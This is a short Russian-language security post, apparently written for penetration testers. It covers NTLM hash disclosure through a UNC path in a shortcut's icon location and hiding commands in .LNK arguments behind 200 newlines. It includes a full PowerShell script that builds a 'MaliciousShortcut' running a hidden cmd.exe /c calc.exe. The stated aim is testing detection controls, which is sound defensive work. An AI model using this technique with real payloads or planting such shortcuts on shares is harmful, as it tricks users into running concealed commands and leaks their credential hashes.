Using LNK files in cyberattacks

Мой хороший друг в прошлом месяце написал отличный пост про использование Hidden Commands в .LNK файлах.
Техника T1204.001 в атрибуте ICON_LOCATION по UNC \\172.27.25.70\test.ico для NTLM Disclosing эффективно используется очень-очень давно, разбросать свои ярлыки и "пропатчить" иконки существующих на всех возможных шарах вообще по умолчанию в составе любой пентест методологии.

Но выполнение команд скрытых в атрибуте COMMAND_LINE_ARGUMENTS файла ярлыка не всегда рассматривается во время проведения тестирований на проникновение, хотя злоумышленники активно используют эту технику в дикой природе. Поэтому крайне важно создать и протестировать технические уровни контроля для обнаружения и предотвращения всех потенциальных векторов с использованием .LNK файлов.

Видимость атрибута COMMAND_LINE_ARGUMENT в GUI ограничена количеством символов, добавив newlines = "`n" * 200 можно полностью скрыть команду от любопытных глаз пользователя.

⚙️ PowerShell скрипт для автоматизации создания ярлыка:

$NAME_STRING="MaliciousShortcut"
$RELATIVE_PATH="C:\Windows\System32\cmd.exe"
$newlines = "`n" * 200
$WORKING_DIR="C:\Windows\System32"
$COMMAND_LINE_ARGUMENTS="$newlines /c calc.exe"
$ICON_LOCATION="C:\Windows\System32\imageres.dll, 197"
$WshShell = New-Object -comObject WScript.Shell
$ShortcutPath = "c:\$NAME_STRING.lnk"
if (Test-Path $ShortcutPath) {

Remove-Item $ShortcutPath

}
$Shortcut = $WshShell.CreateShortcut($ShortcutPath)
$Shortcut.TargetPath = $RELATIVE_PATH
$Shortcut.WorkingDirectory = $WORKING_DIR
$Shortcut.Arguments = $COMMAND_LINE_ARGUMENTS
$Shortcut.IconLocation = $ICON_LOCATION
$Shortcut.Save()